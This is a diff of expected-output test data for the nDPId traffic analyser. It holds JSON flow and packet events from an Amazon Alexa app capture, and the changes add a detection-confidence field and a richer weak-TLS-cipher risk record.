 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2035,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134141,"flow_last_seen":1490976134141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976134141,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -690,24 +690,24 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2043,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxLyFCLFnmK3JKAScSD4HAAAAgQFtAQCCAps+n3SAPZytgEDAwg="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxNJprFn0NKXyaAScSAI+QAAAgQFtAQCCAps+nOsAPZytgEDAwg="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":1490976134200,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976134200,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0vDFAAEAGNB6sECrYNFQ\/OMsVAFCK3c6HwtatV4AQAVc6+AAAAQEICgD2crts+npU"}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134148,"flow_last_seen":1490976134200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976134200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71pwMKDRQIL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134148,"flow_last_seen":1490976134200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976134200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71pwMKDRQIL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2047,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1490976134201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976134201,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0TQdAAEAGo0isECrYNFQ\/OMsUAFAHRT+xsJsTXoAQAVf3QwAAAQEICgD2crxs+nys"}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2048,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA02IxAAEAGF8OsECrYNFQ\/OMsRAFDDaqo\/vffTz4AQAVcBnwAAAQEICgD2crxs+n3S"}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2049,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0xZZAAEAGKrmsECrYNFQ\/OMsSAFCeYrck8hQixoAQAVeWrQAAAQEICgD2crxs+n3S"}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2050,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1490976134202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976134202,"pkt":"AMDKkaPvePiC0\/vCCABFAAA05X9AAEAGCtCsECrYNFQ\/OMsTAFDQ0pfJSaaxaIAQAVeniQAAAQEICgD2crxs+nOs"}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2051,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134146,"flow_last_seen":1490976134203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61oBTb+jZvL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2052,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134140,"flow_last_seen":1490976134203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/51woiL9kgkL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2053,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134141,"flow_last_seen":1490976134203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81diFQyVjHL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2054,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134144,"flow_last_seen":1490976134204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976134204,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71GcCNTb6kL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2051,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134146,"flow_last_seen":1490976134203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61oBTb+jZvL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2052,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134140,"flow_last_seen":1490976134203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/51woiL9kgkL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2053,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134141,"flow_last_seen":1490976134203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976134203,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81diFQyVjHL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2054,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134144,"flow_last_seen":1490976134204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976134204,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/71GcCNTb6kL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2055,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1490976134237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976134237,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxaJEqCkMupghaAScSCurAAAAgQFtAQCCAps+nR5APZytgEDAwg="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":3,"flow_last_seen":1490976134238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976134238,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0EjNAAEAG3hysECrYNFQ\/OMsWAFAy6mCFiRKgpYAQAVdNOgAAAQEICgD2cr9s+nR5"}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134149,"flow_last_seen":1490976134239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976134239,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/612xlaOI2NL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976134149,"flow_last_seen":1490976134239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1490976134239,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/612xlaOI2NL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2236,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976136930,"flow_last_seen":1490976136930,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976136930,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2236,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1490976136930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976136930,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8bqFAAEAGoEasECrYNu8d\/Z+nAbuZbx1qAAAAAKAC\/\/9PLQAAAgQFtAQCCAoA9nPLAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2237,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1490976137042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976137042,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwrQVAAOcGuu027x39rBAq2AG7n6dEArKimW8da3ASH\/7pVAAAAgQFtAEDAwY="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2238,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_packet_id":3,"flow_last_seen":1490976137043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976137043,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobqJAAEAGoFmsECrYNu8d\/Z+nAbuZbx1rRAKyo1AQAVczxgAA"}
-00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2239,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976136930,"flow_last_seen":1490976137044,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1490976137044,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2241,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976136930,"flow_last_seen":1490976137222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976137222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2239,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976136930,"flow_last_seen":1490976137044,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1490976137044,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2241,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976136930,"flow_last_seen":1490976137222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976137222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139642,"flow_last_seen":1490976139642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976139642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1490976139642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976139642,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ooBAAEAGTcesECrYNFQ\/OMsYAFAytNZaAAAAAKAC\/\/+zQgAAAgQFtAQCCAoA9nTaAAAAAAEDAwg="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2275,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976139643,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976139643,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -722,7 +722,7 @@
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1490976139643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976139643,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8MrZAAEAGvZGsECrYNFQ\/OMsdAFCU10ZqAAAAAKAC\/\/\/hCAAAAgQFtAQCCAoA9nTcAAAAAAEDAwg="}
